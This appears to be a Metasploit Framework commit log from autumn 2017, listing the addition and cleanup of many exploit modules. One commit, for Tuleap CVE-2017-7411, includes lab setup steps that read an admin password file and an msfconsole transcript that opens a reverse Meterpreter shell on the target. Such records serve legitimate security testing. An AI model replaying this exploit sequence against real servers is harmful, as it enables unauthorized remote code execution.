Adam Cammack
c740f4369c
Land #9197 , Cleanup Mako Server exploit
2017-11-15 15:01:31 -06:00
Adam Cammack
4219959c6d
Bump ranking to Excellent
2017-11-15 15:00:47 -06:00
Austin
829a7a53db
verbose response.
2017-11-15 12:27:40 -05:00
Austin
4918e5856d
Update polycom_hdx_traceroute_exec.rb
2017-11-15 10:41:51 -05:00
Austin
d93120e2ac
Create polycom_hdx_traceroute_exec.rb
2017-11-15 10:40:57 -05:00
Martin Pizala
33e5508bcb
bypass user namespaces
2017-11-15 15:14:58 +01:00
Mehmet İnce
54936b6ac3
Updatig documentation and tweaking initiate_session
2017-11-15 01:04:06 +03:00
Mehmet İnce
86e47589b0
Add xplico remote code execution
2017-11-14 09:30:57 +03:00
0xFFFFFF
d28ae361ca
Added exploit module for Samsung SRN-1670D vuln CVE-2017-16524
...
Please find my exploit module for the vulnerability CVE-2017-16524 I discovered and tested on Web Viewer 1.0.0.193 on SAMSUNG SRN-1670D
2017-11-12 20:11:44 +01:00
William Vu
f3e2f4d500
Land #9167 , D-Link DIR-850L exploit
2017-11-10 18:15:39 -06:00
William Vu
3936d3baa1
Clean up module
2017-11-10 18:15:22 -06:00
Martin Pizala
971ec80fc1
Keep the python target
2017-11-10 23:11:27 +01:00
Steven Patterson
df2b62dc27
Add Mako Server CMD injection Linux support, update docs, move to multi
2017-11-10 16:28:39 -05:00
William Vu
ea260e87b7
Remove headers, since we didn't send them before
...
http was an invalid key for setting headers, and we still got a shell.
These headers also don't seem relevant to the PUT request.
2017-11-09 11:06:50 -06:00
William Vu
7213e6cc49
Fix #9133 , makoserver_cmd_exec cleanup
2017-11-09 10:52:03 -06:00
attackdebris
500bde1150
get_vars tweak
2017-11-09 04:16:34 -05:00
h00die
52888871e3
Land #8747 RCE for Geutebrueck GCore on Windows
2017-11-08 20:22:54 -05:00
h00die
7ad151e68b
gcore formatting update
2017-11-08 20:21:40 -05:00
attackdebris
a04bc0a25b
Add get_vars, remove a https instance
2017-11-08 16:30:59 -05:00
Adam Cammack
39916ef61a
Land #9133 , Command injection in Mako Server examples
2017-11-08 15:11:01 -06:00
Patrick Webster
d95b333ae9
Added exploit module for HP LoadRunner command exec vuln CVE-2010-1549.
2017-11-09 03:59:18 +11:00
William Vu
b7c604f941
Land #9189 , s/patrick/aushack/g
2017-11-08 10:27:03 -06:00
bwatters-r7
5a07be9b96
Land #9041 , Add LPE on Windows using CVE-2017-8464
2017-11-08 10:09:03 -06:00
Patrick Webster
2f6da89674
Change author name to nick.
2017-11-09 03:00:24 +11:00
Austin
0a4ce1e87b
cmdstager build
...
Removes the need for HTTP Server, utilizes helper CmdStager, reduces module size.
2017-11-07 19:00:59 -05:00
Maurice Popp
6683ba501f
added one missing change
2017-11-07 20:05:43 +01:00
Maurice Popp
8963d77bca
multiple changes as requested by h00die
2017-11-07 20:00:56 +01:00
attackdebris
7173e7f4b4
Add CVE to module description
2017-11-07 11:05:14 -05:00
attackdebris
371f3c333a
This commit adds the jenkins_xstream_deserialize module
2017-11-07 09:46:42 -05:00
Brent Cook
cfeb0b7bda
prefer threadsafe sleep here
2017-11-06 01:37:09 -06:00
Brent Cook
897b5b5dd1
revert passive handler stance
2017-11-06 01:37:09 -06:00
Spencer McIntyre
7d1de9bc48
Fix removing the dropped files after exploitation
2017-11-04 18:50:20 -04:00
Austin
1758ed93d4
Update dlink_850l_unauth_exec.rb
2017-11-04 11:42:49 -04:00
Austin
724c5fb963
finish
2017-11-04 11:41:07 -04:00
Austin
e783cb59ea
add "check" & msftidy
2017-11-04 08:53:50 -04:00
Austin
84599ed3fc
Update dlink_850l_unauth_exec.rb
2017-11-04 07:58:13 -04:00
Austin
cddec8ca6c
download creds, stores in loot.
2017-11-03 14:24:45 -04:00
Austin
32a75e9782
Update dlink_850l_unauth_exec.rb
2017-11-03 09:02:48 -04:00
Austin
705c1cc6a7
Redo Functions
2017-11-03 08:33:42 -04:00
Austin
8c0da8ea90
Update dlink_850l_unauth_exec.rb
2017-11-03 06:24:07 -04:00
Austin
af583e843c
Update dlink_850l_unauth_exec.rb
2017-11-03 06:21:59 -04:00
h00die
697031eb36
mysql UDF now multi
2017-11-03 05:26:05 -04:00
Austin
5b7d803f85
Update dlink_850l_unauth_exec.rb
2017-11-02 15:57:03 -04:00
Austin
429ac71a63
header
2017-11-02 15:53:45 -04:00
Austin
61a67efb82
annnd....it sucks
2017-11-02 15:53:09 -04:00
Spencer McIntyre
70033e2b94
Enable the payload handler by default
2017-11-02 12:31:54 -04:00
William Vu
a15b61a218
Fix #9160 , exploit method from TcpServer
...
It already starts the server and waits for us. This is what was called
when the module was still auxiliary.
2017-11-01 19:26:00 -05:00
William Vu
87934b8194
Convert tnftp_savefile from auxiliary to exploit
...
This has been a long time coming. Fixes #4109 .
2017-11-01 17:37:41 -05:00
William Vu
7a09dcb408
Fix #9109 , HttpServer (TcpServer) backgrounding
2017-11-01 13:35:04 -05:00
William Vu
e3ac6b8dc2
Land #9109 , wp-mobile-detector upload and execute
2017-11-01 13:25:16 -05:00
William Vu
3847a68494
Clean up module
2017-11-01 13:23:32 -05:00
EgiX
0973bfb922
Update tuleap_rest_unserialize_exec.rb
2017-11-01 16:37:14 +01:00
EgiX
6985e1b940
Add module for CVE-2017-7411: Tuleap <= 9.6 Second-Order PHP Object Injection
...
This PR contains a module to exploit [CVE-2017-7411](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7411 ), a Second-Order PHP Object Injection vulnerability in Tuleap before version 9.7 that might allow authenticated users to execute arbitrary code with the permissions of the webserver. The module has been tested successfully with Tuleap versions 9.6, 8.19, and 8.8 deployed in a Docker container.
## Verification Steps
The quickest way to install an old version of Tuleap is through a Docker container. So install Docker on your system and go through the following steps:
1. Run `docker volume create --name tuleap`
2. Run `docker run -ti -e VIRTUAL_HOST=localhost -p 80:80 -p 443:443 -p 22:22 -v tuleap:/data enalean/tuleap-aio:9.6`
3. Run the following command in order to get the "Site admin password": `docker exec -ti <container_name> cat /data/root/.tuleap_passwd`
4. Go to `https://localhost/account/login.php ` and log in as the "admin" user
5. Go to `https://localhost/admin/register_admin.php?page=admin_creation ` and create a new user (NOT Restricted User)
6. Open a new browser session and log in as the newly created user
7. From this session go to `https://localhost/project/register.php ` and make a new project (let's name it "test")
8. Come back to the admin session, go to `https://localhost/admin/approve-pending.php ` and click on "Validate"
9. From the user session you can now browse to `https://localhost/projects/test/ ` and click on "Trackers" -> "Create a New Tracker"
10. Make a new tracker by choosing e.g. the "Bugs" template, fill all the fields and click on "Create"
11. Click on "Submit new artifact", fill all the fields and click on "Submit"
12. You can now test the MSF module by using the user account created at step n.5
NOTE: successful exploitation of this vulnerability requires an user account with permissions to submit a new Tracker artifact or access already existing artifacts, which means it might be exploited also by a "Restricted User".
## Demonstration
```
msf > use exploit/unix/webapp/tuleap_rest_unserialize_exec
msf exploit(tuleap_rest_unserialize_exec) > set RHOST localhost
msf exploit(tuleap_rest_unserialize_exec) > set USERNAME test
msf exploit(tuleap_rest_unserialize_exec) > set PASSWORD p4ssw0rd
msf exploit(tuleap_rest_unserialize_exec) > check
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 089d56ffc3888c5bc90220f843f582aa
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[+] localhost:443 The target is vulnerable.
msf exploit(tuleap_rest_unserialize_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(tuleap_rest_unserialize_exec) > ifconfig docker0 | grep "inet:" | awk -F'[: ]+' '{ print $4 }'
msf exploit(tuleap_rest_unserialize_exec) > set LHOST 172.17.0.1
msf exploit(tuleap_rest_unserialize_exec) > exploit
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 01acd8380d98c587b37ddd75ba8ff6f7
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[*] Sending stage (33721 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:56572) at 2017-11-01 16:07:01 +0100
meterpreter > getuid
Server username: codendiadm (497)
```
2017-11-01 16:09:14 +01:00
Steven Patterson
b96fa690a9
Add brackets to print functions
2017-10-27 15:23:22 -04:00
h00die
037c58d1f6
wp-mobile-detector udpates
2017-10-27 10:10:04 -04:00
Steven Patterson
8613852ee8
Add Mako Server v2.5 command injection module/docs
2017-10-26 23:29:11 -04:00
Jeffrey Martin
43b67fe80b
remove errant bracket, formatting update
2017-10-26 15:01:53 -05:00
Jeffrey Martin
f2cba8d920
Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
...
This restores the original PR
2017-10-25 16:29:11 -05:00
Jeffrey Martin
ca28abf2a2
Revert "Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)"
...
This reverts commit 4999606b61
, reversing
changes made to 4274b76473
.
2017-10-25 16:19:14 -05:00
Jeffrey Martin
0a858cdaa9
Revert "fix my comments from #8933"
...
This reverts commit 02a2839577
.
2017-10-25 16:13:00 -05:00
Jeffrey Martin
02a2839577
fix my comments from #8933
2017-10-25 14:46:41 -05:00
Jeffrey Martin
4999606b61
Land #8933 , Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)
2017-10-25 12:44:04 -05:00
Maurice Popp
df14dc4452
autodetection fixing
2017-10-23 09:07:46 +02:00
h00die
210f6f80b7
netgear1000dng cleanup
2017-10-22 22:17:40 -04:00
Austin
eff94be951
Update netgear_dgn1000_setup_unauth_exec.rb
2017-10-22 16:55:40 -04:00
Austin
6f37bbb1d6
fix EDB
2017-10-22 16:11:19 -04:00
Austin
c7e35f885b
add disc date
2017-10-21 20:13:25 -04:00
Austin
e0831c1053
hopefully fix header..?
2017-10-21 18:38:32 -04:00
Austin
8239d28323
fix header
2017-10-21 09:07:18 -04:00
h00die
cfd7761818
wp_mobile_detector rce
2017-10-20 23:19:58 -04:00
Austin
40e508f2ad
correct mistake
2017-10-20 22:26:54 -04:00
Austin
ac21567743
Fix requested changes
2017-10-20 22:17:04 -04:00
mumbai
b255ddf8d6
New NETGEAR module
2017-10-20 20:25:11 -04:00
mumbai
2f371c9784
Netgear MODULE UNAUTH
2017-10-20 20:15:36 -04:00
mumbai
2e376a1b6a
Merge remote-tracking branch 'upstream/master' into netgear_dgn1000_unauth_setup_exec
2017-10-20 20:13:29 -04:00
h00die
f250e15b6e
Land #9105 rename psh to polycom for name collision
2017-10-20 20:10:57 -04:00
h00die
fd028338e1
move psh to polycom so no more powershell name collision
2017-10-20 20:08:11 -04:00
h00die
5a6da487ab
Land #9043 two exploit modules for unitrends backup
2017-10-20 20:00:35 -04:00
h00die
5abdfe3e59
ueb9 style cleanup
2017-10-20 19:59:24 -04:00
caleBot
c26779ef54
fixed msftidy issues
2017-10-20 14:39:39 -06:00
caleBot
8f622a5003
Update ueb9_bpserverd.rb
2017-10-20 14:35:03 -06:00
caleBot
cce7bf3e19
Update ueb9_bpserverd.rb
2017-10-20 14:33:46 -06:00
caleBot
85152b5f1e
added check function
2017-10-20 14:28:52 -06:00
caleBot
e9ad5a7dca
Update ueb9_api_storage.rb
2017-10-20 14:05:15 -06:00
caleBot
16b6248943
Update ueb9_bpserverd.rb
2017-10-20 13:58:12 -06:00
caleBot
5c0bcd8f0a
Update ueb9_bpserverd.rb
2017-10-20 13:56:25 -06:00
caleBot
abc749e1e8
Update ueb9_api_storage.rb
2017-10-20 13:48:29 -06:00
caleBot
8febde8291
Update ueb9_api_storage.rb
2017-10-20 12:23:53 -06:00
Kent Gruber
7cd532c384
Change targetr to target to fix small typo bug on one failure
...
The target object seems to have a typo where it is referred to as
“targetr” which I’d guess isn’t exactly what we’d like to do in this
case. So, I’ve changed that to “target” in order to work.
So, I’ve simply fixed that small typo.
2017-10-19 19:55:58 -04:00
mumbai
04a24e531b
New module
2017-10-18 21:37:26 -04:00
Wei Chen
c67a5872cd
Land #9055 , Add exploit for Sync Breeze HTTP Server
...
Land #9055
2017-10-13 17:34:03 -05:00
Wei Chen
3a2c6128be
Support automatic targeting
2017-10-13 16:53:22 -05:00
bwatters-r7
294230c455
Land #8509 , add Winsxs bypass for UAC
2017-10-11 16:24:52 -05:00
Jeffrey Martin
cfaa34d2a4
more style cleanup for tomcat_jsp_upload_bypass
2017-10-11 15:53:35 -05:00
Jeffrey Martin
9885dc07f7
updates for style
2017-10-11 15:29:47 -05:00
Jeffrey Martin
1786634906
Land #9059 , Tomcat JSP Upload via PUT Bypass
2017-10-11 15:05:00 -05:00
root
03e7797d6c
fixed msftidy errors and added documentation
2017-10-11 07:57:01 -04:00
h00die
e976a91b15
land #9053 RCE for rend micro imsva
2017-10-10 19:27:06 -04:00
Wei Chen
a4bc3ea3c2
Merge branch 'pr9032' into upstream-master
...
Land #9032 , Improve CVE-2017-8464 LNK exploit
Land #9032
2017-10-10 17:11:51 -05:00
Mehmet Ince
fb16f1fbda
Disabling bind type payloads
2017-10-10 09:37:24 +03:00
peewpw
facc38cde1
set timeout for DELETE request
2017-10-09 21:53:31 -04:00
Mehmet Ince
a2d32b460c
Fixing grammer issue
2017-10-09 22:31:13 +03:00
Mehmet Ince
c14c93d450
Integrate OfficeScan 11 exploitation and fix grammer issues
2017-10-09 22:11:42 +03:00
jakxx
ef282ea154
Sync Breeze HTTP Server v10.0.28 BOF
...
Added support for v10.0.28 to Sync Breeze BOF module
2017-10-09 13:50:24 -04:00
bwatters-r7
fc5ab96ad6
Merging to prep for testing
...
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2017-10-09 10:31:30 -05:00
bwatters-r7
7df18e378d
Fix conflicts in PR 8509 by mergeing to master
2017-10-09 10:30:21 -05:00
Martin Pizala
6d28a579f3
send_request_cgi instead of send_request_raw
2017-10-09 13:12:48 +02:00
peewpw
be8680ba3d
Create tomcat_jsp_upload_bypass.rb
...
Created a module for CVE-2017-12617 which uploads a jsp payload and executes it.
2017-10-08 21:48:47 -04:00
Mehmet Ince
395c82050b
Adding Trend Micro IMSVA Widget RCE
2017-10-08 18:15:32 +03:00
Mehmet Ince
79c9123261
Adding Trend Micro OfficeScan widget rce module
2017-10-08 17:54:18 +03:00
Martin Pizala
33ec3c3d69
Error handling and style
2017-10-08 13:51:16 +02:00
Martin Pizala
d8ff99b1f6
Change to ARCH_X64, remove python dependency
2017-10-08 13:51:07 +02:00
h00die
7a87e11767
land #8781 Utilize Rancher Server to exploit hosts
2017-10-07 13:04:34 -04:00
Maurice Popp
b7184e87c0
fixing a type
2017-10-07 14:16:01 +02:00
Maurice Popp
8d50c34e4b
codefixing
2017-10-07 14:06:58 +02:00
Martin Pizala
34d119be04
Payload space, error handling and style"
2017-10-07 01:12:24 +02:00
William Webb
d9e0d891a1
Land #9010 , Remove checks for hardcoded SYSTEM account name
2017-10-06 13:42:18 -05:00
h00die
7535fe255f
land #8736 RCE for orientdb
2017-10-06 14:35:42 -04:00
caleBot
752d21e11c
forgot a comma
2017-10-06 10:47:42 -06:00
caleBot
63e3892392
fixed issues identified by msftidy
2017-10-06 10:16:01 -06:00
caleBot
78e262eabd
fixed issues identified by msftidy
2017-10-06 10:15:30 -06:00
caleBot
36610b185b
initial commit for UEB9 exploits - CVE-2017-12477, CVE-2017-12478
2017-10-06 09:38:33 -06:00
Maurice Popp
770547269b
added documentation, and fixed 4 to 2 indentation
2017-10-06 15:39:25 +02:00
Brent Cook
9d2e8b1e4d
Land #8003 , Evasions for delivering nops/shellcode into memory
2017-10-05 16:44:36 -05:00
Spencer McIntyre
e4d99a14b6
Fix EXITFUNC back to process for the RCE too
2017-10-05 11:38:08 -04:00
Spencer McIntyre
4729c885f1
Cleanup the CVE-2017-8464 LPE module
2017-10-05 11:10:37 -04:00
Spencer McIntyre
d0ebfa1950
Change the template technicque to work as an LPE
2017-10-05 10:30:28 -04:00
Spencer McIntyre
825ad940e6
Update the advanced option names and a typo
2017-10-05 10:16:31 -04:00
Spencer McIntyre
482ce005fd
Update the advanced option names and a typo
2017-10-05 10:11:00 -04:00
Pearce Barry
7400082fdb
Land #9040 , Add CVE and Vendor article URL to the denyall_waf_exec module
2017-10-04 09:12:48 -05:00
Mehmet Ince
110f3c9b4a
Add cve and vendor article to the denyall_waf_exec module
2017-10-04 12:11:58 +03:00
William Vu
10dafdcb12
Fix #9036 , broken refs in bypassuac_comhijack
...
Each ref needs to be an individual array.
2017-10-03 13:36:29 -05:00
ashish gahlot
9ff6efd3a3
Remove broken link
2017-10-02 20:43:55 +05:30
Martin Pizala
e3326e1649
Use send_request_cgi instead of raw
2017-10-01 02:15:43 +02:00
Martin Pizala
701d628a1b
Features for selecting the target
2017-10-01 02:04:10 +02:00
Spencer McIntyre
f2f48cbc8f
Update the CVE-2017-8464 module
2017-09-30 18:25:16 -04:00
William Vu
9b75ef7c36
Land #8343 , qmail Shellshock module
2017-09-29 00:28:30 -05:00
William Vu
daedf0d904
Clean up module
2017-09-29 00:27:22 -05:00
Martin Pizala
3a1a437ac7
Rubocop Stlye
2017-09-28 23:53:45 +02:00
Martin Pizala
40c58e3017
Function for selecting the target host
2017-09-28 23:43:59 +02:00
Martin Pizala
cc98e80002
Change arch to ARCH_X64
2017-09-28 20:50:18 +02:00
Christian Mehlmauer
41e3895424
remove checks for hardcoded name
2017-09-27 07:41:06 +02:00
William Vu
98ae054b06
Land #8931 , Node.js debugger exploit
2017-09-25 14:00:13 -05:00
g0tmi1k
1ee590ac07
Move over to rex-powershell and version bump
...
Version bump for:
- https://github.com/rapid7/rex-powershell/pull/10
- https://github.com/rapid7/rex-powershell/pull/11
2017-09-25 13:45:06 +01:00
h00die
4d1e51a0ff
Land #8906 RCE for supervisor
2017-09-24 08:03:30 -04:00
h00die
9528f279a5
cleaned up version, and docs
2017-09-23 10:51:52 -04:00
Pearce Barry
e8eeb784e4
Land #8960 , spelling/grammar fixes part 3
2017-09-22 18:51:31 -05:00
Pearce Barry
8de6fa79c1
Tweakz, yo.
2017-09-22 18:49:09 -05:00
Pearce Barry
d56fffcadf
Land #8974 , spelling/grammar fixes part 4. Finished.
2017-09-22 14:59:28 -05:00
Mehmet Ince
3d543b75f5
Fixing typos and replacing double quotes with single
2017-09-21 23:48:12 +03:00
Mehmet Ince
1031d7960a
Moving token extraction to the seperated function
2017-09-20 10:23:32 +03:00
Mehmet Ince
ee969ae8e5
Adding DenyAll RCE module
2017-09-19 14:53:37 +03:00
h00die
c90f885938
Finished spelling issues
2017-09-17 16:00:04 -04:00
William Webb
d5362333e2
Land #8958 , Add Disk Pulse Enterprise web server buffer overflow
2017-09-15 13:34:22 -05:00
h00die
30f833f684
80 pages left
2017-09-13 22:03:34 -04:00
loftwing
52385f4d9e
fix formatting to fit rubocop
2017-09-13 11:46:57 -05:00
loftwing
b8c40a9d95
Clean up formatting
2017-09-13 11:13:33 -05:00
loftwing
3c204f91ef
Correct module title
2017-09-13 11:02:13 -05:00
loftwing
65f2ee9109
added generate_seh_record
2017-09-13 10:56:32 -05:00
loftwing
7db506887b
Add exploit code
2017-09-13 10:36:36 -05:00
loftwing
eb0d174987
Add disk_pulse_enterprise_get module
2017-09-13 10:19:24 -05:00
Pearce Barry
7b87915e1f
Land #8923 , Add additional error checking to mssql_clr_payload module
2017-09-11 17:39:33 -05:00
Tod Beardsley
5f66b7eb1a
Land #8940 , @h00die's second round of desc fixes
...
One ninja edit along the way as well.
2017-09-11 13:05:13 -05:00
Tod Beardsley
cfbd3c1615
Fix spelling of Honeywell
2017-09-11 13:02:18 -05:00
james
ba880d1a85
Changes to mssql_clr_payload error handling based on code review
2017-09-10 14:15:39 -05:00
Patrick Thomas
2966fb7c8c
Accept @shawizard suggestion for formatting msg_body
2017-09-10 11:23:52 -07:00
h00die
7339658ba9
224 pages of spelling issues left
2017-09-09 09:52:08 -04:00
h00die
6289cc0b70
Merge branch 'spellin' of https://github.com/h00die/metasploit-framework into spellin
2017-09-08 22:20:39 -04:00
h00die
0910c482a9
35 pages of spelling done
2017-09-08 22:19:55 -04:00
Brent Cook
8f864c27e3
Land #8924 , Add Apache Struts 2 REST Plugin XStream RCE
2017-09-08 13:59:52 -05:00
Brent Cook
54a62976f8
update versions and add quick module docs
2017-09-08 13:59:29 -05:00
William Vu
978fdb07b0
Comment out PSH target and explain why
...
I hope we can fix the PSH target in the future, but the Windows dropper
works today, and you can specify a custom EXE if you really want.
2017-09-08 13:41:06 -05:00
dmohanty-r7
c91ef1f092
Land #8768 , Add Docker Daemon TCP exploit module
2017-09-08 12:50:00 -05:00
Pearce Barry
2ebf53b647
Minor tweaks...
2017-09-08 10:04:47 -05:00
h00die
00c593e0a2
55 pages of spelling done
2017-09-07 21:18:50 -04:00
William Vu
a9a307540f
Assign cmd to entire case and use encode for XML
...
Hat tip @acammack-r7. Forgot about that first syntax!
2017-09-07 19:36:08 -05:00
William Vu
8f1e353b6e
Add Apache Struts 2 REST Plugin XStream RCE
2017-09-07 19:30:48 -05:00
James Barnett
7e9d0b3e9b
Fix permissions in docker priv_esc module
...
The previous command didn't give the original user enough permissions
to execute the payload. This was resulting in permission denied
and preventing me from getting a root shell.
Fixes #8937
2017-09-07 16:48:02 -05:00
g0tmi1k
accb77d268
Add PSH (Binary) as a target to web_delivery
2017-09-07 10:55:29 +01:00
Patrick Thomas
5d009c8d0b
remove dead code
2017-09-06 23:21:56 -07:00
Patrick Thomas
048316864c
remove redundant return
2017-09-06 23:01:13 -07:00
Patrick Thomas
97d08e0da4
fix reviewer comments
2017-09-06 22:53:02 -07:00
Patrick Thomas
d71f7876b8
initial commit of nodejs debugger eval exploit
2017-09-06 22:29:24 -07:00
g0tmi1k
96f7012fe7
Code clean up (URLs, ordering and printing)
2017-09-06 13:17:28 +01:00
g0tmi1k
b884705a93
regsvr32_applocker_bypass_server -> web_delivery
2017-09-06 12:35:52 +01:00
g0tmi1k
e7b4cb71b1
Add PSH-Proxy to multi/script/web_delivery
2017-09-06 12:27:04 +01:00
h00die
be66ed8af3
Land #8788 exploits for Gh0st and PlugX malware controllers
2017-09-05 20:42:07 -04:00
james
44fb059cea
Add error checking to mssql_clr_payload
...
Additional error checking had been added to exploits/windows/mssql/mssql_clr_payload
If an error is encountered when changing the trustworthy or clr setting, the exploit fails with a message.
2017-09-05 18:48:22 -05:00
h00die
d05c401866
modules cleanup and add docs
2017-09-04 20:57:23 -04:00
Pearce Barry
6051a1a1c1
Land #8910 , Use meta redirect instead of JS redirect in 2 modules
2017-09-01 13:50:02 -05:00
Tod Beardsley
86db2a5771
Land #8888 from @h00die, with two extra fixes
...
Fixes spelling and grammar in a bunch of modules. More to come!
2017-08-31 14:37:02 -05:00
Tod Beardsley
642a13e820
Out out damn tick
2017-08-31 14:29:05 -05:00
james
49173818fd
Addresses #8674
...
This type of redirection will work without javascript being enabled.
Modules:
multi/browser/firefox_xpi_bootstrapped_addon
multi/browser/itms_overflow
More info on the meta element:
https://developer.mozilla.org/en-US/docs/Web/HTML/Element/meta
2017-08-30 23:16:46 -05:00
Calum Hutton
3b745bd17c
Rework the bash, redirect stdout/err to /dev/null
...
Dont need the -
2017-08-30 03:49:30 +01:00
Calum Hutton
9387a765e5
Fix msftidy warns/errs
2017-08-30 03:10:46 +01:00
Calum Hutton
4934023fa5
Use alternate system() payload, dont worry about restarts
...
Use nohup and & to background the meterpreter process
2017-08-30 03:10:46 +01:00
Calum Hutton
d53f10554d
Configurable restart command
2017-08-30 03:10:46 +01:00
Calum Hutton
d0ff2694b3
Restart after payload process ends
2017-08-30 03:10:46 +01:00
Calum Hutton
aee44e3bd2
Working meterpreter exploit
...
No service restart
2017-08-30 03:10:46 +01:00
Calum Hutton
7cfb5fcc97
Rename
2017-08-30 03:10:46 +01:00